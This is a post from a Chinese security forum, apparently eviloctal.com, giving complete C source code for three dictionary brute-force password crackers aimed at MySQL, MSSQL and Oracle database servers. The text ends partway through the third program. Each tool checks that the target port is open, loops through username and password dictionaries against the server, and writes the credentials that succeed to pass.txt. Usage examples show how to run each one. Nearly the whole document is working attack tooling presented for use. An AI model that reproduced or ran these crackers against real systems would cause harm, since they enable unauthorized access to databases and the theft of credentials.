用链表实现的MYSQL、MSSQL和oracle密码暴破C程序
议题作者:pt007[at]vip.sina.com版权所有,转载请注明版权
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
/*程序一:用链表实现的MYSQL密码暴破程序,参考了[email protected]的程序,进行了一些修改*/
#define WIN32_LEAN_AND_MEAN
#if defined(_WIN32) || defined(_WIN64)
#include <windows.h>
#include <Tchar.h>
#endif
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include "F:\pt007\f\database\mysql\mysql_pwd_crack\include\mysql.h"
#include <stdlib.h>
//链接到WS2_32.LIB库:
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "libmySQL.lib")
//定义链表:
typedef struct PassNode{
TCHAR password[100];
struct PassNode * Next;
} PassInfo;
typedef struct NameNode{
TCHAR Name[100];
struct NameNode * Next;
}NameInfo;
void usage(){
printf("mysql password crack v 1.0\n");
printf("\t author:[email protected] and [email protected]\n\n");
fprintf(stdout,"usage : mysql_pwd_crack [ip] [options]\n");
printf("options:\n"
"\t-u username specify the username of mysql\n"
"\t-x port specify the port of mysql\n"
"\t-p password specify the password of mysql\n"
"\t-d dict specify the dictionary\n"
"\t-a automode automatic crack the mysql password \n"
"\tNote: when u use the -a option, named the username dict user.dic\n"
"\t password dict pass.dic\n"
);
printf("\nexample: mysql_pwd_crack 127.0.0.1 -x 3306 -u sql_user.dic -d pass.dic\n");
printf("\t mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.dic\n");
printf("\t mysql_pwd_crack 127.0.0.1 -x 3306 -a\n");
exit(1);
}
PassInfo * Create_Pass_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */
TCHAR * szTempPass = NULL;
PassInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/
if ( (h = (PassInfo *) malloc(sizeof(PassInfo))) == NULL )
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
} /* create the head node */
/* init the head node*/
h->Next = NULL;
p = h;
for ( i=0; i < NodeNum; i ++)
{
szTempPass = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempPass, 100);
if ( (s = (PassInfo *)malloc(sizeof(PassInfo))) == NULL)
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
}
memset(s->password, '\0', 100);
fgets(szTempPass, 100, DictFile);
strncpy(s->password, szTempPass, strlen(szTempPass)-1);
s->Next =NULL;
p->Next = s;
p = s;
free(szTempPass);
}
return h;
}
NameInfo * Create_Name_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */
TCHAR * szTempName = NULL;
NameInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/
if ( (h = (NameInfo *) malloc(sizeof(NameInfo))) == NULL )
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
} /* create the head node */
/* init the head node*/
h->Next = NULL;
p = h;
for ( i=0; i < NodeNum; i ++)
{
szTempName = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempName, 100);
if ( (s = (NameInfo *)malloc(sizeof(NameInfo))) == NULL)
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
}
memset(s->Name, '\0', 100);
fgets(szTempName, 100, DictFile);
strncpy(s->Name, szTempName, strlen(szTempName)-1);
s->Next =NULL;
p->Next = s;
p = s;
free(szTempName);
}
return h;
}
int LineCount(FILE * fd) //返回字典中的密码数量
{
int countline = 0;
char data[100] = {0};//字符数组清0
while (fgets(data, 100, fd))//从指定的文件中读一个字符串到字符数组中
countline++;
rewind(fd);//指针返回到文件起始处
return countline;
}
BOOL IsPortOpen(char * address, int port)
{
int recv = 1;
WSADATA wsadata;
int fd;
struct sockaddr_in clientaddress;
struct hostent * host1;
BOOL Result = FALSE;
struct timeval timer4;
fd_set writefd; //检查数据是否可写
ULONG value = 1;
//初使化winsock版本1.1:
recv = WSAStartup(MAKEWORD(1,1), &wsadata);
if(recv != 0)
{
printf("init failed %d.\n",WSAGetLastError());
return(0);
}
if ( LOBYTE( wsadata.wVersion ) != 1 ||
HIBYTE( wsadata.wVersion ) != 1 ) {
/* Tell the user that we couldn't find a useable */
/* winsock.dll. */
WSACleanup();
return(0);
}
//创建socket套接字连接:
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(fd < 0)
{
printf("[-] Create socket error %d. \n",WSAGetLastError());
return(0);
}
//将套接字fd设为非阻塞模式的方法:
ioctlsocket(fd,FIONBIO,&value);
if (!(host1 = gethostbyname(address))){
printf("[-] Gethostbyname(%s) error %d.\n",address,WSAGetLastError());
return(0);
}
memset(&clientaddress, 0, sizeof(struct sockaddr));
clientaddress.sin_family =AF_INET;//Ipv4地址族
clientaddress.sin_port = htons((unsigned short)port);
clientaddress.sin_addr = *((struct in_addr *)host1->h_addr);
timer4.tv_sec = 5;//以秒为单位指定等待时间
timer4.tv_usec = 0;
FD_ZERO(&writefd);
FD_SET(fd,&writefd); //将套接字fd增添到writefd写集合中进行测试
recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr));
if( FD_ISSET(fd, &writefd))
{
recv = select(fd+1, NULL, &writefd, NULL, &timer4);//测试5秒钟内是否有数据写入
if( recv > 0 )
Result = TRUE;
}
closesocket(fd);
WSACleanup();
return Result;
}
int main(int argc, char **argv)
{
MYSQL *sock,mysql;//定义MYSQL结构
PassInfo * head, * curr = NULL;
NameInfo * headnode, * currnode = NULL;
int namecount = 0, passcount = 0;
/////////////////////////////////////////////////////////////////////////////////////////////
// deal with the command line
//
/////////////////////////////////////////////////////////////////////////////////////////////
if( argc != 5) //参数不为5或8个的时候打印帮助
if(argc != 8)
usage();
if (argc == 8)
{
if ( strcmpi(argv[2], "-x") )
usage();
if ( strcmpi(argv[4], "-u") )
if ( strcmpi(argv[4], "-p") )
usage();
if ( !strcmpi(argv[4], "-u") )
if ( strcmpi(argv[6], "-d") )
usage();
if ( !strcmpi(argv[4], "-p") )
if ( strcmpi(argv[6], "-d") )
usage();
}
if (argc == 5)
{
if ( strcmpi(argv[2], "-x") )
usage();
if ( strcmpi(argv[4], "-a") )
usage();
}
/* determinate whether the mysql port is open */
if( !IsPortOpen(argv[1], atoi(argv[3]) ) )
{
printf("error:Can't connect to %s:%d\n", argv[1], atoi(argv[3]));
exit(0);
}
////////////////////////////////////////////////////////////////////////////////////////////
// specifiy the username
//////////////////////////////////////////////////////////////////////////////////////////////
mysql_init(&mysql); /* init the mysql */
if ( !strcmpi(argv[4], "-u"))
{
/* open the password dictionary */
FILE * passdic = NULL;
if ( (passdic = fopen(argv[7], "r")) ==NULL){
fprintf(stdout, "Can't open the password dictionary\n");
exit(0);
}
/* count line of name dictionary */
passcount = LineCount(passdic); //计算密码的数量
head = Create_Pass_link(passcount, passdic); /* create the password link */
curr = head ->Next;
/* open the password dictionary */
FILE * Namedict = NULL;
if ( (Namedict = fopen(argv[5], "r")) ==NULL){
fprintf(stderr, "Can't open the name dictionary\n");
exit(0);
}
/*密码最终保存文件*/
FILE *passtxt=NULL;
if ( (passtxt = fopen("pass.txt", "at+")) ==NULL){
fprintf(stdout, "Can't write pass.txt file!\n");
exit(0);
}
/* count line of name dictionary */
namecount = LineCount(Namedict);//计算用户名数量
headnode = Create_Name_link(namecount, Namedict); /* create user link */
currnode = headnode->Next;
int j=0,i=1;
while(currnode!=NULL)
{
printf("\n开始第%d位用户%s测试:\n",++j,currnode->Name);
while(curr != NULL)
{
printf("Now cracking %s %s \n", currnode->Name, curr->password);
fflush(NULL);
if ( sock = mysql_real_connect(&mysql, argv[1], currnode->Name, curr->password, "mysql", atoi(argv[3]), NULL, 0) )
{
printf("%d.Successfully:Mysql server %s's username [%s] password [%s]\n",j,argv[1],currnode->Name, curr->password);
fseek(passtxt, 0L, SEEK_END);//移动到文件尾部
fprintf(passtxt,"%d.Successfully:Mysql server %s's username [%s] password [%s]\r\n",i++,argv[1],currnode->Name, curr->password);
//exit(0);发现一个密码就退出
break;
}
curr = curr->Next;
Sleep(100);
} /* starting crack the mysql password*/
currnode = currnode->Next;
curr = head ->Next;
}
printf("\n\n密码猜解结束:\n本次共猜解了%d位用户,%d个密码!\n",namecount,passcount);
printf("请使用\"type pass.txt\"来查看当前目录下的pass.txt文件!\n");
fprintf(passtxt,"\r\n\r\n");
fclose(passdic);
fclose(Namedict);
fclose(passtxt);
free(head);
}
///////////////////////////////////////////////////////////////////////////////////////////////////
// specifiy the password
//////////////////////////////////////////////////////////////////////////////////////////////////
if ( !strcmpi(argv[4], "-p"))
{
/* open the password dictionary */
FILE * Namedict = NULL;
if ( (Namedict = fopen(argv[7], "r")) ==NULL){
fprintf(stderr, "Can't open the name dictionary\n");
exit(0);
}
/* count line of name dictionary */
namecount = LineCount(Namedict);
headnode = Create_Name_link(namecount, Namedict); /* create user link */
currnode = headnode->Next;
while (currnode != NULL)
{
printf("Now cracking %s %s \n", currnode->Name, argv[5]);
fflush(NULL);
if ( sock = mysql_real_connect(&mysql, argv[1], currnode->Name, argv[5], "mysql", atoi(argv[3]), NULL, 0) )
printf("\nSuccessfully --> username %s password %s \n", currnode->Name, argv[5]);
currnode = currnode->Next;
Sleep(100);
}
fclose(Namedict);
free(currnode);
}
////////////////////////////////////////////////////////////////////////////////////////////////
// automatic mdoe
////////////////////////////////////////////////////////////////////////////////////////////////
if ( !strcmpi(argv[4], "-a"))
{
FILE * usernamedict = NULL, *passwordict = NULL;
int nameline = 0, passline = 0;
NameInfo * namehead, * currname = NULL;
PassInfo * passhead, * currpass = NULL;
/* open the user.dic */
if ( (usernamedict = fopen("user.dic", "r")) ==NULL){
fprintf(stderr, "Can't open the user.dic file.\n");
exit(0);
}
/* open the pass.dic */
if ( (passwordict = fopen("pass.dic", "r")) ==NULL){
fprintf(stderr, "Can't open the user.dic file.\n");
exit(0);
}
/* count the line of the files */
nameline = LineCount(usernamedict);
passline = LineCount(passwordict);
namehead = Create_Name_link(nameline, usernamedict);
passhead = Create_Pass_link(passline, passwordict);
/* starting crack mysql password*/
currname = namehead->Next;
currpass = passhead->Next;
while (currname != NULL)
{
while(currpass != NULL)
{
printf("Now cracking %s %s \n", currname->Name, currpass->password);
fflush(NULL);
if ( sock = mysql_real_connect(&mysql, argv[1], currname->Name, currpass->password, "mysql", atoi(argv[3]), NULL, 0) )
printf("\nSuccessfully --> username %s password %s \n", currname->Name, currpass->password);
currpass = currpass->Next;
Sleep(100);
}
currpass = passhead->Next;
currname = currname->Next;
}
fclose(usernamedict);
fclose(passwordict);
free(namehead);
free(passhead);
}
mysql_close(sock);
return 0;
}
/*程序二:用链表实现的mssql密码暴破程序*/
#define WIN32_LEAN_AND_MEAN
#if defined(_WIN32) || defined(_WIN64)
#include <windows.h>
#include <Tchar.h>
#endif
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <lmcons.h>
#include <sql.h>
#include <sqlext.h>
#include <winnetwk.h>
#include <time.h>
#include <stdlib.h>
//链接到WS2_32.LIB库:
#pragma comment(lib, "Ws2_32.lib")
//#pragma comment(lib, "libmssql.lib")
char target[40]= {0};//目标服务器
char port[40]={0};//SQL端口号
//定义链表:
typedef struct PassNode{
TCHAR password[100];
struct PassNode * Next;
} PassInfo;
typedef struct NameNode{
TCHAR Name[100];
struct NameNode * Next;
}NameInfo; //定义NameInfo来表示NameNode结构
//
//函数SQLCheck
//功能:尝试用不同密码连接SQL Server,探测出正确的密码
//
DWORD WINAPI SQLCheck(PVOID pPwd,PVOID uUserName)
{
//定义局部变量
char szBuffer[1025]= {0};
char *pwd=NULL,*UserName=NULL;
//char *user=NULL;
SWORD swStrLen;
SQLHDBC hdbc; //用于存放SQL连接句柄
SQLHANDLE henv; //SQL环境句柄
SQLRETURN retcode;//ODBC API运行返回值
char ConnStr[250]={0};//连接数据库字符串
//取得传递过来准备探测的密码
pwd=(char *)pPwd;
UserName=(char *)uUserName;
//构造连接数据库字符:
strcpy(ConnStr,"DRIVER={SQL Server};SERVER=");
strcat(ConnStr,target);
strcat(ConnStr,",");
strcat(ConnStr,port);
strcat(ConnStr,";UID=");
strcat(ConnStr,UserName);
strcat(ConnStr,";PWD=");
strcat(ConnStr,pwd);
strcat(ConnStr,";DATABASE=master");
//printf("%s\n",ConnStr);//Output:DRIVER={SQL Server};SERVER=127.0.0.1,1433;UID=sa;PWD=ptpy;DATABASE=master
//创建数据库应用的环境句柄:
if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&henv) !=SQL_SUCCESS)
{
printf("\nAllocate environment handle failed.\n");
return 0;
}
//printf("henv..");
//设置ODBC版本环境:
if (SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION,(SQLPOINTER)SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
{
printf("\nSet the ODBC version environment attribute failed.\n");
SQLFreeHandle(SQL_HANDLE_ENV, henv);//释放SQL句柄
return 0;
}
//printf("ODBC ver..");
//创建连接句柄:
if ((retcode= SQLAllocHandle(SQL_HANDLE_DBC,henv,(SQLHDBC FAR*)&hdbc)) != SQL_SUCCESS)
{
printf("\nAllocate connection handle failed.\n");
SQLFreeHandle(SQL_HANDLE_ENV, henv);
return 0;
}
//printf("hdbc..");
//连接数据源:
retcode= SQLDriverConnect(hdbc,NULL,(unsigned char *)ConnStr,strlen(ConnStr),
(unsigned char *)szBuffer,sizeof(szBuffer),&swStrLen,
SQL_DRIVER_COMPLETE_REQUIRED);
//printf("conn..");
if(retcode!=SQL_SUCCESS && retcode != SQL_SUCCESS_WITH_INFO)
{
//连接失败,函数终止
//printf("\nCouldn't connect to %s MSSQL server.\n",target);
SQLFreeHandle(SQL_HANDLE_DBC, hdbc);//释放SQL连接句柄
SQLFreeHandle(SQL_HANDLE_ENV, henv);//释放SQL环境句柄
return 0;
}
//连接远程MSSQL Server数据库成功
return 1;
//strcpy(passwd,pwd);
//puts(szBuffer);
//显示连接远程数据库的字符串
//断开连接:
SQLDisconnect(hdbc);
//printf("disconn..");
//释放连接句柄
SQLFreeHandle(SQL_HANDLE_DBC, hdbc);
//printf("free hdbc..");
//释放环境句柄
SQLFreeHandle(SQL_HANDLE_ENV, henv);
//printf("free henv..\n");
return 0;
}
void usage(){
printf("\t name:mssql password crack v 1.0\n");
printf("\t author:[email protected]\n\n");
fprintf(stdout,"usage : sql_pwd_crack [ip] [options]\n");
printf("options:\n"
"\t-x port specify the port of mssql\n"
"\t-u username specify the username of mssql\n"
// "\t-p password specify the password of mssql\n"
"\t-d dict specify the dictionary\n"
//"\t-a automode automatic crack the mssql password \n"
//"\tNote: when u use the -a option, named the username dict user.dic\n"
// "\t password dict pass.dic\n"
);
printf("\nexample: sql_pwd_crack 127.0.0.1 -x 1433 -u sql_user.dic -d pass.dic\n");
exit(1);
}
//创建密码链表:
PassInfo * Create_Pass_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */
TCHAR * szTempPass = NULL;
PassInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/
//分配内存空间在内存的动态存储区中分配一块长度为"sizeof(PassInfo)"字节的连续区域,函数的返回值为该区域的首地址:
if ( (h = (PassInfo *) malloc(sizeof(PassInfo))) == NULL )
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
} /* create the head node */
/* init the head node*/
h->Next = NULL;
p = h;
for ( i=0; i < NodeNum; i ++) //下面是建立链表,每个密码对应一个结点:
{ //按sizeof(TCHAR)的长度分配100块连续的区域,并把指向TCHAR类型指针的首地址赋予指针变量szTempPass
szTempPass = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempPass, 100);
if ( (s = (PassInfo *)malloc(sizeof(PassInfo))) == NULL)
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
}
memset(s->password, '\0', 100);
fgets(szTempPass, 100, DictFile);
strncpy(s->password, szTempPass, strlen(szTempPass)-1);
s->Next =NULL; //删除一个结点
p->Next = s;//链表指针指向下一个结构地址
p = s;//下一个结构的数据域赋值
free(szTempPass);//释放内存空间
}
return h;//返回链表的头结点,它存放有第一个结点的首地址,没有数据
}
//创建用户名链表:
NameInfo * Create_Name_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */
TCHAR * szTempName = NULL;
NameInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/
//分配内存空间在内存的动态存储区中分配一块长度为"sizeof(NameInfo)"字节的连续区域,函数的返回值为该区域(此处为 NameInfo结构的首地址)的首地址: :
if ( (h = (NameInfo *) malloc(sizeof(NameInfo))) == NULL )
{
fprintf(stdout, "malloc failed %d", GetLastError());
exit(0);
} /* create the head node */
/* init the head node*/
h->Next = NULL; //删除下一个结点
p = h; //p里面目前指向头结点
for ( i=0; i < NodeNum; i ++)
{//按sizeof(TCHAR)的长度分配100块连续的区域,并把指向TCHAR类型指针的首地址赋予指针变量szTempPass:
szTempName = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempName, 100);//字符串类型变量清0
if ( (s = (NameInfo *)malloc(sizeof(NameInfo))) == NULL)
{
fprintf(stdout, "malloc failed %d", GetLastError());
exit(0);
}
memset(s->Name, '\0', 100);
fgets(szTempName, 100, DictFile);
strncpy(s->Name, szTempName, strlen(szTempName)-1);
s->Next =NULL;
p->Next = s;//p指向下一个结点的地址
p = s;//下一个结构的数据域赋值
free(szTempName);
}
return h;
}
int LineCount(FILE * fd) //返回字典中的密码数量
{
int countline = 0;
char data[100] = {0};//字符数组清0
while (fgets(data, 100, fd))//从指定的文件中读一个字符串到字符数组中
countline++;
rewind(fd);//指针返回到文件起始处
return countline;
}
BOOL IsPortOpen(char * address, int port)
{
int recv = 1;
WSADATA wsadata;
int fd;
struct sockaddr_in clientaddress;
struct hostent * host1;
BOOL Result = FALSE;
struct timeval timer4;
fd_set writefd; //检查数据是否可写
ULONG value = 1;
//初使化winsock版本1.1:
recv = WSAStartup(MAKEWORD(1,1), &wsadata);
if(recv != 0)
{
printf("init failed %d.\n",WSAGetLastError());
return(0);
}
if ( LOBYTE( wsadata.wVersion ) != 1 ||
HIBYTE( wsadata.wVersion ) != 1 ) {
/* Tell the user that we couldn't find a useable */
/* winsock.dll. */
WSACleanup();
return(0);
}
//创建socket套接字连接:
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(fd < 0)
{
printf("[-] Create socket error %d. \n",WSAGetLastError());
return(0);
}
//将套接字fd设为非阻塞模式的方法:
ioctlsocket(fd,FIONBIO,&value);
if (!(host1 = gethostbyname(address))){
printf("[-] Gethostbyname(%s) error %d.\n",address,WSAGetLastError());
return(0);
}
memset(&clientaddress, 0, sizeof(struct sockaddr));
clientaddress.sin_family =AF_INET;//Ipv4地址族
clientaddress.sin_port = htons((unsigned short)port);
clientaddress.sin_addr = *((struct in_addr *)host1->h_addr);
timer4.tv_sec = 5;//以秒为单位指定等待时间
timer4.tv_usec = 0;
FD_ZERO(&writefd);
FD_SET(fd,&writefd); //将套接字fd增添到writefd写集合中进行测试
recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr));
if( FD_ISSET(fd, &writefd))
{
recv = select(fd+1, NULL, &writefd, NULL, &timer4);//测试5秒钟内是否有数据写入
if( recv > 0 )
Result = TRUE;
}
closesocket(fd);
WSACleanup();
return Result;
}
int main(int argc, char **argv)
{
PassInfo * head, * curr = NULL;
NameInfo * headnode, * currnode = NULL;
int namecount = 0, passcount = 0;
/////////////////////////////////////////////////////////////////////////////////////////////
// deal with the command line
//
/////////////////////////////////////////////////////////////////////////////////////////////
//参数不为8个的时候打印帮助
if(argc != 8)
usage();
if (argc == 8)
{
if ( strcmpi(argv[2], "-x") )
usage();
if ( strcmpi(argv[4], "-u") )
if ( strcmpi(argv[4], "-p") )
usage();
if ( !strcmpi(argv[4], "-u") )
if ( strcmpi(argv[6], "-d") )
usage();
if ( !strcmpi(argv[4], "-p") )
if ( strcmpi(argv[6], "-d") )
usage();
}
/* determinate whether the mssql port is open */
if( !IsPortOpen(argv[1], atoi(argv[3]) ) )
{
printf("error:Can't connect to %s:%d\n", argv[1], atoi(argv[3]));
exit(0);
}
////////////////////////////////////////////////////////////////////////////////////////////
// specifiy the username
//////////////////////////////////////////////////////////////////////////////////////////////
//取得目标地址和端口号:
strcpy(target,argv[1]);
strcpy(port,argv[3]);
if ( !strcmpi(argv[4], "-u"))
{
/* open the password dictionary */
FILE * passdic = NULL;
if ( (passdic = fopen(argv[7], "r")) ==NULL){
fprintf(stdout, "Can't open the password dictionary\n");
exit(0);
}
/* count line of name dictionary */
passcount = LineCount(passdic); //计算密码的数量
head = Create_Pass_link(passcount, passdic); /* create the password link */
curr = head ->Next; //指向第一个结点
/* open the password dictionary */
FILE * Namedict = NULL;
if ( (Namedict = fopen(argv[5], "r")) ==NULL){
fprintf(stderr, "Can't open the name dictionary\n");
exit(0);
}
/*密码最终保存文件*/
FILE *passtxt=NULL;
if ( (passtxt = fopen("pass.txt", "at+")) ==NULL){
fprintf(stdout, "Can't write pass.txt file!\n");
exit(0);
}
/* count line of name dictionary */
namecount = LineCount(Namedict);//计算用户名数量
headnode = Create_Name_link(namecount, Namedict); /* create user link */
currnode = headnode->Next;
int j=0,i=1;
while(currnode!=NULL) //为NULL表示姓名链表结束
{
printf("\n开始第%d位用户%s测试:\n",++j,currnode->Name);
while(curr != NULL) //为NULL表示密码链表结束
{
printf("Now cracking %s %s \n", currnode->Name, curr->password);
fflush(NULL);
int Cracked=0;
Cracked=SQLCheck(curr->password,currnode->Name);
if ( Cracked==1 )
{
printf("%d.Successfully:mssql server %s's username [%s] password [%s]\n",j,target,currnode->Name, curr->password);
fseek(passtxt, 0L, SEEK_END);//移动到文件尾部
fprintf(passtxt,"%d.Successfully:mssql server %s's username [%s] password [%s]\r\n",i++,target,currnode->Name, curr->password);
//exit(0);发现一个密码就退出
break;
}
curr = curr->Next;//移动到下一个结点
Sleep(100);//暂停100ms,即0.1s
} /* starting crack the mssql password*/
currnode = currnode->Next;
curr = head ->Next; //移到密码链表的第一个结点
}
printf("\n\n密码猜解结束:\n本次共猜解了%d位用户,%d个密码!\n",namecount,passcount);
printf("请使用\"type pass.txt\"来查看当前目录下的pass.txt文件!\n");
fprintf(passtxt,"\r\n\r\n");
fclose(passdic);
fclose(Namedict);
fclose(passtxt);
free(head);
}
return 0;
}
/*程序三:用链表实现的oracle密码暴破程序*/
/*用链表实现的oracle密码暴破程序*/
#define WIN32_LEAN_AND_MEAN
#if defined(_WIN32) || defined(_WIN64)
#include <windows.h>
#include <Tchar.h>
#endif
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <lmcons.h>
#include <winnetwk.h>
#include <time.h>
#include <stdlib.h>
#include <stdlib.h>
#include <iostream>
#include <occi.h>
#pragma comment(lib, "oraocci9.lib") //链接到oraocci9.lib库
//#pragma comment(lib, "msvcrt.lib")
#pragma comment(lib, "msvcprt.lib")
//链接到WS2_32.LIB库:
#pragma comment(lib, "Ws2_32.lib")
//#pragma comment(lib, "liboracle.lib")
char target[40]= {0};//目标服务器
char port[40]={0};//SQL端口号
char db[40]={0};//数据库名
//定义链表:
typedef struct PassNode{
TCHAR password[100];
struct PassNode * Next;
} PassInfo;
typedef struct NameNode{
TCHAR Name[100];
struct NameNode * Next;
}NameInfo; //定义NameInfo来表示NameNode结构
//
//函数SQLCheck
//功能:尝试用不同密码连接SQL Server,探测出正确的密码
//
DWORD WINAPI SQLCheck(PVOID pPwd,PVOID uUserName)
{
//定义局部变量
char szBuffer[1025]= {0};
char *pwd=NULL,*UserName=NULL,*DataBase=NULL;
//char *user=NULL;
//取得传递过来准备探测的密码
pwd=(char *)pPwd;
UserName=(char *)uUserName;
DataBase=(char *)db;
using namespace std;
using namespace oracle::occi;
Environment * env=Environment::createEnvironment(Environment::DEFAULT);
try{
Connection *conn=env->createConnection(UserName,pwd,db);
if (conn)
{ printf("\n");
cout << "SUCCESS - createConnection" << endl;
//连接远程oracle Server数据库成功
return 1;
}
else
cout << "FAILURE - createConnection" << endl;
return 0;
/*Statement*stmt=conn->createStatement("select * from emp");
ResultSet * rset=stmt->executeQuery();
while (rset->next()) {
cout<<"the empno is:"<<rset->getInt(1)<<endl;
cout<<"the ename is:"<<rset->getString(2)<<endl;
} */
//stmt->closeResultSet (rset);
// conn->terminateStatement (stmt);
env->terminateConnection (conn);
}catch(SQLException ex)
{
//printf("\n");
cout<<ex.getMessage();
return 0;
}
Environment::terminateEnvironment(env);
return 0;
}
void usage(){
printf("name:oracle password crack v 1.0\n");
printf("author:[email protected]\n\n");
fprintf(stdout,"usage : oracle_pwd_crack [ip] [options]\n");
printf("options:\n"
"\t-x port specify the port of oracle\n"
"\t-u username specify the username of oracle\n"
// "\t-p password specify the password of oracle\n"
"\t-d dict specify the dictionary\n"
"\t-i database specify the database's name\n"
//"\t-a automode automatic crack the oracle password \n"
//"\tNote: when u use the -a option, named the username dict user.dic\n"
// "\t password dict pass.dic\n"
);
printf("\nexample: oracle_pwd_crack 127.0.0.1 -x 1521 -u sql_user.dic -d pass.dic -i test11\n");
exit(1);
}
//创建密码链表:
PassInfo * Create_Pass_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */
TCHAR * szTempPass = NULL;
PassInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/
//分配内存空间在内存的动态存储区中分配一块长度为"sizeof(PassInfo)"字节的连续区域,函数的返回值为该区域的首地址:
if ( (h = (PassInfo *) malloc(sizeof(PassInfo))) == NULL )
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
} /* create the head node */
/* init the head node*/
h->Next = NULL;
p = h;
for ( i=0; i < NodeNum; i ++) //下面是建立链表,每个密码对应一个结点:
{ //按sizeof(TCHAR)的长度分配100块连续的区域,并把指向TCHAR类型指针的首地址赋予指针变量szTempPass
szTempPass = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempPass, 100);
if ( (s = (PassInfo *)malloc(sizeof(PassInfo))) == NULL)
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
}
memset(s->password, '\0', 100);
fgets(szTempPass, 100, DictFile);
strncpy(s->password, szTempPass, strlen(szTempPass)-1);
s->Next =NULL; //删除一个结点
p->Next = s;//链表指针指向下一个结构地址
p = s;//下一个结构的数据域赋值
free(szTempPass);//释放内存空间
}
return h;//返回链表的头结点,它存放有第一个结点的首地址,没有数据
}
//创建用户名链表:
NameInfo * Create_Name_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */
TCHAR * szTempName = NULL;
NameInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/
//分配内存空间在内存的动态存储区中分配一块长度为"sizeof(NameInfo)"字节的连续区域,函数的返回值为该区域(此处为 NameInfo结构的首地址)的首地址: :
if ( (h = (NameInfo *) malloc(sizeof(NameInfo))) == NULL )
{
fprintf(stdout, "malloc failed %d", GetLastError());
exit(0);
} /* create the head node */
/* init the head node*/
h->Next = NULL; //删除下一个结点
p = h; //p里面目前指向头结点
for ( i=0; i < NodeNum; i ++)
{//按sizeof(TCHAR)的长度分配100块连续的区域,并把指向TCHAR类型指针的首地址赋予指针变量szTempPass:
szTempName = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempName, 100);//字符串类型变量清0
if ( (s = (NameInfo *)malloc(sizeof(NameInfo))) == NULL)
{
fprintf(stdout, "malloc failed %d", GetLastError());
exit(0);
}
memset(s->Name, '\0', 100);
fgets(szTempName, 100, DictFile);
strncpy(s->Name, szTempName, strlen(szTempName)-1);
s->Next =NULL;
p->Next = s;//p指向下一个结点的地址
p = s;//下一个结构的数据域赋值
free(szTempName);
}
return h;
}
int LineCount(FILE * fd) //返回字典中的密码数量
{
int countline = 0;
char data[100] = {0};//字符数组清0
while (fgets(data, 100, fd))//从指定的文件中读一个字符串到字符数组中
countline++;
rewind(fd);//指针返回到文件起始处
return countline;
}
BOOL IsPortOpen(char * address, int port)
{
int recv = 1;
WSADATA wsadata;
int fd;
struct sockaddr_in clientaddress;
struct hostent * host1;
BOOL Result = FALSE;
struct timeval timer4;
fd_set writefd; //检查数据是否可写
ULONG value = 1;
//初使化winsock版本1.1:
recv = WSAStartup(MAKEWORD(1,1), &wsadata);
if(recv != 0)
{
printf("init failed %d.\n",WSAGetLastError());
return(0);
}
if ( LOBYTE( wsadata.wVersion ) != 1 ||
HIBYTE( wsadata.wVersion ) != 1 ) {
/* Tell the user that we couldn't find a useable */
/* winsock.dll. */
WSACleanup();
return(0);
}
//创建socket套接字连接:
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(fd < 0)
{
printf("[-] Create socket error %d. \n",WSAGetLastError());
return(0);
}
//将套接字fd设为非阻塞模式的方法:
ioctlsocket(fd,FIONBIO,&value);
if (!(host1 = gethostbyname(address))){
printf("[-] Gethostbyname(%s) error %d.\n",address,WSAGetLastError());
return(0);
}
memset(&clientaddress, 0, sizeof(struct sockaddr));
clientaddress.sin_family =AF_INET;//Ipv4地址族
clientaddress.sin_port = htons((unsigned short)port);
clientaddress.sin_addr = *((struct in_addr *)host1->h_addr);
timer4.tv_sec = 5;//以秒为单位指定等待时间
timer4.tv_usec = 0;
FD_ZERO(&writefd);
FD_SET(fd,&writefd); //将套接字fd增添到writefd写集合中进行测试
recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr));
if( FD_ISSET(fd, &writefd))
{
recv = select(fd+1, NULL, &writefd, NULL, &timer4);//测试5秒钟内是否有数据写入
if( recv > 0 )
Result = TRUE;
